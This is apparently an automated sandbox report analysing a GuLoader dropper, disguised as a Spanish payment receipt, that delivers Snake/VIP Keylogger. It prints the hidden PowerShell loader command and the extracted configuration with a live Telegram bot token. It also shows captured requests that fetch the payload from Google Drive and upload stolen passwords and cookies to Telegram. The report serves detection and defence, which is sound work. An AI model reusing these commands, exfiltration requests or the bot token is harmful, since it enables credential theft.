Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Justificante pago-09453256434687.exe

Overview

General Information

Sample name:Justificante pago-09453256434687.exe
Analysis ID:1576296
MD5:4252cd5753def4a484fb3313e1029e66
SHA1:19fd0734102e1eebe6c7f42d530d30e920366e00
SHA256:96b8248be606c47b8955a560f3df160a4c9026ce1956e407daf177f17549e4f7
Tags:exeuser-threatcat_ch
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Justificante pago-09453256434687.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\Justificante pago-09453256434687.exe" MD5: 4252CD5753DEF4A484FB3313E1029E66)
    • powershell.exe (PID: 7528 cmdline: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 8012 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM", "Chat_id": "5234817354", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000001.00000002.2067270709.0000000009B22000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) ", CommandLine: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Justificante pago-09453256434687.exe", ParentImage: C:\Users\user\Desktop\Justificante pago-09453256434687.exe, ParentProcessId: 7460, ParentProcessName: Justificante pago-09453256434687.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) ", ProcessId: 7528, ProcessName: powershell.exe
            Sigma detected: Msiexec Initiated Connection
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8012, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) ", CommandLine: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Justificante pago-09453256434687.exe", ParentImage: C:\Users\user\Desktop\Justificante pago-09453256434687.exe, ParentProcessId: 7460, ParentProcessName: Justificante pago-09453256434687.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) ", ProcessId: 7528, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T18:28:56.968822+010028033053Unknown Traffic192.168.2.449740104.21.67.152443TCP
            2024-12-16T18:29:13.174013+010028033053Unknown Traffic192.168.2.449781104.21.67.152443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T18:28:52.347535+010028032742Potentially Bad Traffic192.168.2.449738158.101.44.24280TCP
            2024-12-16T18:28:55.285176+010028032742Potentially Bad Traffic192.168.2.449738158.101.44.24280TCP
            2024-12-16T18:28:58.363210+010028032742Potentially Bad Traffic192.168.2.449742158.101.44.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T18:28:44.726551+010028032702Potentially Bad Traffic192.168.2.449736172.217.19.174443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM", "Chat_id": "5234817354", "Version": "4.4"}
            Source: msiexec.exe.8012.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendMessage"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.4% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240187A8 CryptUnprotectData,6_2_240187A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24018EF1 CryptUnprotectData,6_2_24018EF1
            Source: Justificante pago-09453256434687.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49806 version: TLS 1.2
            Source: Justificante pago-09453256434687.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\System.Core.pdb source: powershell.exe, 00000001.00000002.2065851466.000000000823C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb\c source: powershell.exe, 00000001.00000002.2065851466.0000000008272000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: stem.Core.pdb source: powershell.exe, 00000001.00000002.2065851466.000000000823C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2065851466.0000000008272000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0307F45Dh6_2_0307F2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0307F45Dh6_2_0307F4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0307FC19h6_2_0307F974
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A531E0h6_2_21A52DC8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A52C19h6_2_21A52968
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A50D0Dh6_2_21A50B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A51697h6_2_21A50B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A5DC51h6_2_21A5D9A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A531E0h6_2_21A52DB8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A531E0h6_2_21A5310E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A5D7F9h6_2_21A5D550
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A5CF49h6_2_21A5CCA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A5D3A1h6_2_21A5D0F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A5FAB9h6_2_21A5F810
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_21A50040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_21A50853
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A5F661h6_2_21A5F3B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A5EDB1h6_2_21A5EB08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A5F209h6_2_21A5EF60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A5E959h6_2_21A5E6B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A5E0A9h6_2_21A5DE00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_21A50673
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21A5E501h6_2_21A5E258
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24017EB5h6_2_24017B78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401BA76h6_2_2401B7A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24019280h6_2_24018FB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 240132B1h6_2_24013008
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401DEF6h6_2_2401DC28
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 240162D9h6_2_24016030
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401BF06h6_2_2401BC38
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 240102E9h6_2_24010040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24013709h6_2_24013460
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov esp, ebp6_2_2401B081
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24016733h6_2_24016488
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24010741h6_2_24010498
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401E386h6_2_2401E0B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401C396h6_2_2401C0C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24010B99h6_2_240108F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401E816h6_2_2401E548
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24010FF1h6_2_24010D48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401C826h6_2_2401C558
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24011449h6_2_240111A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401ECA6h6_2_2401E9D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401CCB6h6_2_2401C9E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 240118A1h6_2_240115F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24016CC1h6_2_24016A18
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 240148C9h6_2_24014620
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24011CF9h6_2_24011A50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401F136h6_2_2401EE68
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24017119h6_2_24016E70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401D146h6_2_2401CE78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24014D21h6_2_24014A78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24012151h6_2_24011EA8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24017571h6_2_240172C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24015179h6_2_24014ED0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401F5C6h6_2_2401F2F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 240125A9h6_2_24012300
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401D5D6h6_2_2401D308
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401B5E6h6_2_2401B318
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 240179C9h6_2_24017720
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 240155D1h6_2_24015328
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24012A01h6_2_24012758
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24015A29h6_2_24015780
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401FA56h6_2_2401F788
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2401DA66h6_2_2401D798
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24012E59h6_2_24012BB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 24015E81h6_2_24015BD8

            Networking

            barindex
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2017/12/2024%20/%2019:35:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f5b7140c899Host: api.telegram.orgContent-Length: 581
            Source: global trafficHTTP traffic detected: POST /bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f89892680e0Host: api.telegram.orgContent-Length: 7046Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49781 -> 104.21.67.152:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 104.21.67.152:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.217.19.174:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2017/12/2024%20/%2019:35:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
